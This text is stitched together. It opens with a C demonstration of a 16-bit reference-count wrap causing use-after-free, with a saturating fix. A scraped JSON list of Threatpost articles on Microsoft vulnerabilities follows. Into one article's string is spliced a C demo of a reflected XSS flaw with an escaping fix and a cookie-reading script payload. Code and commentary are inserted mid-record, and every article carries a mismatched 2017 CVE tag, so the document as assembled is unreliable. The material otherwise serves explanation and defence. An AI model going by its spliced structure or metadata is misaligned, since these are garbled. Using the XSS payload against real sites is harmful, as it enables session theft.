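    return 0;
}

/* Buggy per-packet handler: takes a reference it never releases. */
static void handle_packet_buggy(struct pkt_ctx *c)
{
    ctx_ref(c);
}

/* Correct per-packet handler: take and release are balanced. */
static void handle_packet_fixed(struct pkt_ctx *c)
{
    ctx_ref(c);
    ctx_unref(c);
}

/* Deliver n packets to handler while the owner still holds its reference,
 * then run one well-behaved ref/unref pair. Returns 1 if that pair freed the
 * object out from under the owner, which can only happen if the count wrapped. */
static int burst(void (*handler)(struct pkt_ctx *), unsigned long n)
{
    struct pkt_ctx *c = ctx_new();
    for (unsigned long i = 0; i < n; i++)
        handler(c);
    ctx_ref(c);
    int premature = ctx_unref(c);
    if (!premature) {
        /* demo clean-up: discard whatever the handler leaked and let the
         * owner release its own reference normally */
        c->refcount = 1;
        ctx_unref(c);
    }
    return premature;
}

int buggy_burst(unsigned long n) { return burst(handle_packet_buggy, n); }
int fixed_burst(unsigned long n) { return burst(handle_packet_fixed, n); }

/* Hardened take: refuse a reference that would wrap, so an unbalanced caller
 * can saturate the counter but never drive it back through zero. */
int ctx_ref_checked(struct pkt_ctx *c)
{
    if (c->refcount == UINT16_MAX)
        return 0;
    c->refcount++;
    return 1;
}

/* Same burst with the leaky handler, but every take goes through the check. */
int checked_burst(unsigned long n)
{
    struct pkt_ctx *c = ctx_new();
    for (unsigned long i = 0; i < n; i++)
        ctx_ref_checked(c);           /* still leaks, but cannot wrap */
    int premature = 0;
    if (ctx_ref_checked(c))
        premature = ctx_unref(c);
    if (!premature) {
        c->refcount = 1;
        ctx_unref(c);
    }
    return premature;
}

int main(void)
{
    printf("buggy handler, 65535 packets: freed under owner = %d\n", buggy_burst(65535));
    printf("buggy handler, 100 packets:   freed under owner = %d\n", buggy_burst(100));
    printf("fixed handler, 65535 packets: freed under owner = %d\n", fixed_burst(65535));
    printf("checked take, 65535 packets:  freed under owner = %d\n", checked_burst(65535));
    return 0;
}
```

buggy_burst(65535) returns 1: the owner's single reference plus 65,535 leaked ones is exactly 65,536, which a 16-bit counter stores as 0, so the next ordinary take/release pair frees the object. What the owner sees afterwards is exactly Microsoft's four scenarios and depends on what the allocator does with the freed memory; saturating the counter, as ctx_ref_checked does, is the standard defence because it turns a wrap into a leak, which is a much less dangerous failure.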
\u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will get the patch automatically; everyone else is urged by Microsoft to install it.\n\nThis month\u2019s update had a distinct IE feel to it, with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older versions of the browser. 
With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:36", "description": "Dennis Fisher talks with Ryan Naraine about the new Microsoft bug bounty program, how it may affect prices for vulnerabilities on the private market and why it took the company so long to start the reward program.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>\n\nDownload: [digital_underground_116](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044126/digital_underground_116.mp3>)[ \n](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>)\n", "cvss3": {}, "published": "2013-06-21T09:49:19", "type": "threatpost", "title": "Ryan Naraine on Microsoft's New Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-16T20:41:20", "id": "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "href": 
"https://threatpost.com/ryan-naraine-on-microsofts-bug-bounty-program/101053/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:52", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060714/katie_moussouris2.jpg>)Dennis Fisher talks with Katie Moussouris of Microsoft about her childhood exploits with Commodore 64 programming, ignoring her Barbies, growing up as a hacker, her days as a pen tester and the challenges of working on security at Microsoft.\n\nDownload: [12_moussouris.mp3](<http://traffic.libsyn.com/digitalunderground/10_moussouris.mp3>)\n\n_*Microsoft image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream, Creative Commons_\n", "cvss3": {}, "published": "2013-11-04T09:00:25", "type": "threatpost", "title": "How I Got Here: Katie Moussouris", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-04T19:16:25", "id": "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "href": "https://threatpost.com/how-i-got-here-katie-moussouris/102784/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:05", "description": "[](<https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/>)It\u2019s been more than 10 years now since Microsoft began the initiative that would eventually become Trustworthy Computing, and while the effects it\u2019s had inside the company have been well documented, the utility and adoption of the Security Development Lifecycle by outside organizations and customers is less well-known. 
Several large organizations have adopted the SDL, either in whole or in part, and Microsoft executives say that the effects on these organizations are going to be just as important as they were for Microsoft.\n\nThe company this week is hosting its first Security Development Conference in Washington, D.C., and one of the things that Microsoft executives are focusing on is how the SDL has spread beyond Redmond and taken hold in a number of other industries and organizations. One of those recent adopters of the SDL is Itron, a company that manufactures smart meters for installation around the world. Those meters are used to regulate and measure power usage in homes and businesses, and the use of these machines has become somewhat controversial in the security community because of potential vulnerabilities and attacks. \n\nTo help address those issues, Itron began a software security program based on the Microsoft SDL. The idea behind the effort is to address potential security bugs and attack vectors before the meters are deployed. Steve Lipner, one of the driving forces behind the Trustworthy Computing initiative and SDL at Microsoft, said in an interview that the company is happy to see the SDL spreading beyond Microsoft\u2019s walls and having an effect in other industries.\n\n\u201cIt\u2019s very important to see adoption by governments and private industry,\u201d he said. \u201cThe adoption of secure development can have an important global effect. Some of the meter specifications involve providing a disconnect switch on the meters and they needed to get the security right or the consequences could be devastating.\u201d\n\nSecurity researchers already have discovered [vulnerabilities in some smart meters](<https://threatpost.com/researchers-find-security-flaws-smart-meters-033110/>) and privacy advocates have questioned whether the data on the meters will be protected adequately. 
Last year, California approved new [data security rules for smart meters](<https://threatpost.com/california-approves-data-security-rules-smart-meters-081711/>), which prevent the utilities from disclosing customers\u2019 usage or other data to third parties. Those same concerns about attacks and vulnerabilities are what is driving the use of the SDL at Itron.\n\n\u201cThe light bulb went off for me when my customer looked across the table and said, \u2018We\u2019re planning on putting disconnect switches on every meter,\u2019\u201d Michael Garrison Stuber, an engineering advisor at Itron, said. \u201cThe implication was that this level of access to the network would equal the ability to control that network. From that standpoint I immediately realized, \u2018This could be a giant target.\u2019\u201d\n\nFor some companies, the development of a software security program is driven by a recent security failure or series of attacks, but for others it\u2019s more a case of customers pushing the vendor. That was the case for Microsoft when it began its effort more than a decade ago, and also for Itron. But some of the motivation also came from not wanting to go through the typical release, bug, patch cycle any longer. Paying pen testers and consultants to find bugs after the products are made can be an expensive proposition.\n\n\u201cI got tired of writing six-figure checks to these outside vendors,\u201d said Stuber. \u201cFrom a business standpoint it just made perfect sense to me that we need to be investing in how we do development so we\u2019re thinking about security throughout the lifecycle.\u201d\n\nLipner said he\u2019d like to see even more adoption of the SDL in other industries.\n\n\u201cWe\u2019re encouraging customers to adopt the tools we\u2019ve published as a way to save money and build more secure software,\u201d he said. 
\u201cThe customers need to demand secure development practices.\u201d\n", "cvss3": {}, "published": "2012-05-16T13:14:29", "type": "threatpost", "title": "Microsoft's SDL Expands Beyond Redmond", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:14", "id": "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "href": "https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/76570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:55", "description": "[](<https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/>)There is a [cross-site scripting flaw in SharePoint 2007](<http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html>), Microsoft\u2019s collaboration product, which could let an attacker execute arbitrary JavaScript in a victim\u2019s browser in the context of the SharePoint site. \n\nHigh-Tech Bridge, a Swiss security firm, published an advisory about the vulnerability on Thursday, along with proof-of-concept code to demonstrate the exploit. \n\n\u201cThe vulnerability exists due to failure in the \u201c/_layouts/help.aspx\u201d script to properly sanitize user-supplied input in \u201ccid0\u201d variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data,\u201d the company said in its advisory.\n\nMicrosoft\u2019s Security Response Center said it is working on mitigations, workarounds and a fix for the vulnerability. 
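The SharePoint bug above is a reflected cross-site scripting flaw: whatever arrives in the cid0 query parameter is written into the page without encoding, so a crafted link runs script in the victim's session. The C functions below are an added example, not High-Tech Bridge's proof of concept or SharePoint's code; the page template is assumed. They render the parameter the vulnerable way and after HTML-encoding, which is the fix the advisory's wording implies.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* HTML-encode s into out (capacity outlen). The five characters replaced are
 * the ones that can close a text node or an attribute value. Returns 0 on
 * success, -1 if out is too small; out is NUL-terminated on success. */
int html_escape(const char *s, char *out, size_t outlen)
{
    size_t o = 0;
    for (; *s; s++) {
        char one[2] = { *s, '\0' };
        const char *rep;
        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (o + n + 1 > outlen)
            return -1;
        memcpy(out + o, rep, n);
        o += n;
    }
    if (o + 1 > outlen)
        return -1;
    out[o] = '\0';
    return 0;
}

/* Assumed page template standing in for help.aspx: the topic id is echoed
 * into the body. The vulnerable handler pastes the parameter in verbatim. */
int render_help_vulnerable(const char *cid0, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "<h1>Help topic %s</h1>", cid0);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Fixed handler: encode for the HTML text context before interpolating. */
int render_help_fixed(const char *cid0, char *out, size_t outlen)
{
    char enc[1024];
    if (html_escape(cid0, enc, sizeof enc) != 0)
        return -1;
    int n = snprintf(out, outlen, "<h1>Help topic %s</h1>", enc);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* 1 if the rendered markup still contains a live script tag. */
int has_script_tag(const char *html)
{
    return strstr(html, "<script") != NULL;
}

/* Render payload with one of the two handlers and report whether a script
 * tag survives; -1 if rendering failed. */
int script_survives(int use_fixed, const char *payload)
{
    char page[1024];
    int rc = use_fixed ? render_help_fixed(payload, page, sizeof page)
                       : render_help_vulnerable(payload, page, sizeof page);
    return rc == 0 ? has_script_tag(page) : -1;
}

/* 1 if html_escape(in) produces exactly expected (self-check helper). */
int escapes_to(const char *in, const char *expected)
{
    char buf[256];
    return html_escape(in, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

int main(void)
{
    /* constructed attack value of the kind a reflected-XSS PoC carries */
    const char *payload = "<script>alert(document.cookie)</script>";
    char page[1024];
    render_help_vulnerable(payload, page, sizeof page);
    printf("vulnerable: %s  (script live: %d)\n", page, has_script_tag(page));
    render_help_fixed(payload, page, sizeof page);
    printf("fixed:      %s  (script live: %d)\n", page, has_script_tag(page));
    return 0;
}
```

The encoder is context-specific: it is correct for HTML text and quoted attribute values, but a parameter that lands inside a URL, a JavaScript string or a CSS block needs that context's own encoding as well, which is why the usual advice is to encode at the point of output for the exact context, not once at input.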
\n", "cvss3": {}, "published": "2010-04-29T17:12:54", "type": "threatpost", "title": "New Flaw Found in Microsoft SharePoint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:53:17", "id": "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "href": "https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/73898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:02", "description": "[](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>)Microsoft Corp. issued its monthly security bulletins on Tuesday, with fixes for four known vulnerabilities in the company\u2019s Windows operating system, Office suite and Remote Desktop Connection products. \n\nThe March patch release included three bulletins: [MS11-015](<http://www.microsoft.com/technet/security/bulletin/ms11-015.mspx>), [016](<http://www.microsoft.com/technet/security/bulletin/ms11-016.mspx>) and [017](<http://www.microsoft.com/technet/security/bulletin/ms11-017.mspx>). Only one, MS11-015, is rated critical \u2013 indicating a danger of the holes being used in remote attacks or to enable fast-spreading worms. The other two bulletins are rated \u201cimportant.\u201d \n\nMS11-015 fixes a publicly disclosed hole in the DirectShow product and one previously undisclosed vulnerability in Windows Media Player and Media Center. The vulnerabilities, if exploited, would have allowed attackers to use specially crafted Microsoft Digital Video Recording (.dvr-ms) files to run malicious code on a vulnerable Windows system. Microsoft rated it critical for affected versions of Windows XP, as well as all supported versions of Windows Vista and Windows 7. Windows Media Center TV Pack for Vista is also affected, the company said. 
\n\nBoth the MS11-016 and 017 patches address DLL preloading issues in Microsoft products \u2013 Microsoft Groove 2007 Service Pack 2 and the Remote Desktop Connection client. That issue, in which an application loads a library from an attacker-controlled location such as the current working directory instead of the intended system path, affects a wide range of software from different vendors and was first disclosed in August 2010. In September, Microsoft [released guidance on the](<https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/>) impact of the DLL hijacking bug, and a Fix-It tool that allowed customers to ameliorate the impact of the hole.\n\nThe company did not issue a fix for a serious flaw in the way that Windows manages MHTML operations. As Threatpost [reported last month](<https://threatpost.com/microsoft-warns-mhtml-bug-windows-012811/>), that hole affects all current versions of Windows and could allow an attacker to run code on vulnerable systems. Microsoft issued a Security Advisory about the MHTML bug in January. In its March patch release, the company said that it was \u201cmonitoring the threat landscape\u201d and \u201cworking to provide a solution through our monthly security update release process,\u201d suggesting that it will ship the fix in a regular monthly release rather than as an out-of-cycle patch once one is ready. 
\n\nMarch\u2019s batch of patches is smaller than the company\u2019s February release, which [comprised 12 separate bulletins containing fixes for 22 vulnerabilities across a range of products](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>).\n", "cvss3": {}, "published": "2011-03-08T21:23:27", "type": "threatpost", "title": "Microsoft Fills Windows, Office Holes with March Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:00", "id": "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "href": "https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/75006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy settings for the next version of its search engine. Currently, forcing the site to HTTPS does not yield an SSL-protected session; instead the browser shows a warning about an unsafe connection.\n\nFiresheep, [the Firefox extension introduced at Toorcon](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>), allows attackers to capture site cookies from users on unsecured wireless networks and browse under their logon. \n\nWith the advent of Firesheep and, subsequently, its surge of recently converted hackers, HTTP session hijacking is becoming more and more of a concern. Sites like Bing will have to adopt suitable security techniques to contend with the extension\u2019s further proliferation. \n\nFirefox 4, scheduled for release by the end of the year, will help. [As reported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport Security, ensuring that the browser always requests an HTTPS session from sites that declare it. However, HSTS only works where the site itself offers SSL: if sites like Bing don\u2019t implement it, there is no end-to-end encryption and HTTPS won\u2019t even be an option.\n\n[Network World has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "[](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>)\n\nLess than a week after the [publication of exploit code](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) for a gaping hole in the FTP Service in Microsoft Internet Information Services (IIS), attackers are launching what is described as \u201climited attacks\u201d against Windows users.\n\nMicrosoft has updated its security advisory to warn of the new attacks and added new mitigation workarounds for businesses running IIS 5.0, 5.1 and 6.0.\n\nIn addition to the in-the-wild attacks, Microsoft warned that a new proof of concept has been published to demonstrate a denial-of-service attack on Windows XP and Windows Server 2003 with read access to the File Transfer Protocol (FTP) service.\n\n\u201cThis does not require Write access,\u201d the company warned. \n\nAlso, a new proof of concept allowing DoS was separately disclosed that affects the version of FTP 6 which shipped with Windows Vista and Windows Server 2008. 
\n\nMicrosoft also noted that FTP 7.5 is available from the Download Center for Windows Vista and Windows Server 2008, and that FTP 7.5 is not vulnerable to any of these exploits.\n\nEarlier this week, [Microsoft issued an advisory](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) to confirm the severity of this vulnerability, which allows remote code execution on affected systems running the FTP service and connected to the Internet.\n", "cvss3": {}, "published": "2009-09-08T11:58:04", "type": "threatpost", "title": "Attackers Pounce on Microsoft FTP in IIS Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:48", "id": "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "href": "https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/72235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:24", "description": "Microsoft is warning customers about the availability of the [ChapCrack tool that Moxie Marlinspike built](<https://threatpost.com/new-tool-moxie-marlinspike-cracks-some-crypto-passwords-073012/>) to crack the credentials of VPNs that authenticate with the MS-CHAPv2 protocol. The company said that while it\u2019s not aware of any active attacks using the tool, customers can protect themselves by implementing PEAP or changing to a more secure VPN tunnel.\n\nMarlinspike unveiled the ChapCrack tool at DEF CON last month, and it\u2019s designed to take packet captures from sessions using the MS-CHAPv2 protocol and strip out the user\u2019s credentials from the cryptographic handshake in the session. 
In order to recover the user\u2019s credentials, Marlinspike submits the captured handshake to CloudCracker, which returns the cracked key material; fed back into ChapCrack, that material decrypts the handshake and yields the credentials.\n\nIn its advisory, Microsoft says that while the ChapCrack tool doesn\u2019t take advantage of a security vulnerability per se, it still represents a risk to users.\n\n\u201cAn attacker who successfully exploited these cryptographic weaknesses could obtain user credentials. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource,\u201d the company said in its [advisory on ChapCrack](<http://technet.microsoft.com/en-us/security/advisory/2743314>).\n\n\u201cAn attacker has to be able to intercept the victim\u2019s MS-CHAP v2 handshake in order to exploit this weakness, by performing man-in-the-middle attacks or by intercepting open wireless traffic. An attacker who obtained the MS-CHAP v2 authentication traffic could then use the exploit code to decrypt a user\u2019s credentials.\u201d\n\nMicrosoft recommends that customers who use MS-CHAPv2 implement PEAP (Protected Extensible Authentication Protocol) to further secure their VPNs. \n", "cvss3": {}, "published": "2012-08-20T19:11:41", "type": "threatpost", "title": "Microsoft Warns Users About ChapCrack Tool Availability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:41", "id": "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "href": "https://threatpost.com/microsoft-warns-users-about-chapcrack-tool-availability-082012/76929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. 
With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. 
Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET check in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique in use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and, ideally, whether it discloses memory that can be used to build a ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 raised the bar: DEP stops injected data from being executed, and ASLR randomizes where modules load, so an attacker can no longer hard-code the address of existing code to reuse.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. 
\u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can make the process leak an address back to the exploit, he learns where a module is loaded; that defeats ASLR, and with a known module he can build a ROP chain from its existing code to get around DEP, Vreugdenhil said. From there, an attacker needs to figure out which additional memory protections are in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. 
\u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. 
As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function and store only the hash. Depending upon which hash function is being used, and what kind of hardware is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. 
We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. _\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "Dennis Fisher talks with Adam Shostack of Microsoft about the taxonomy he helped develop for classifying how PCs are compromised, what he would and wouldn\u2019t change in The New School of Information Security and who he\u2019s learned the most from.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on 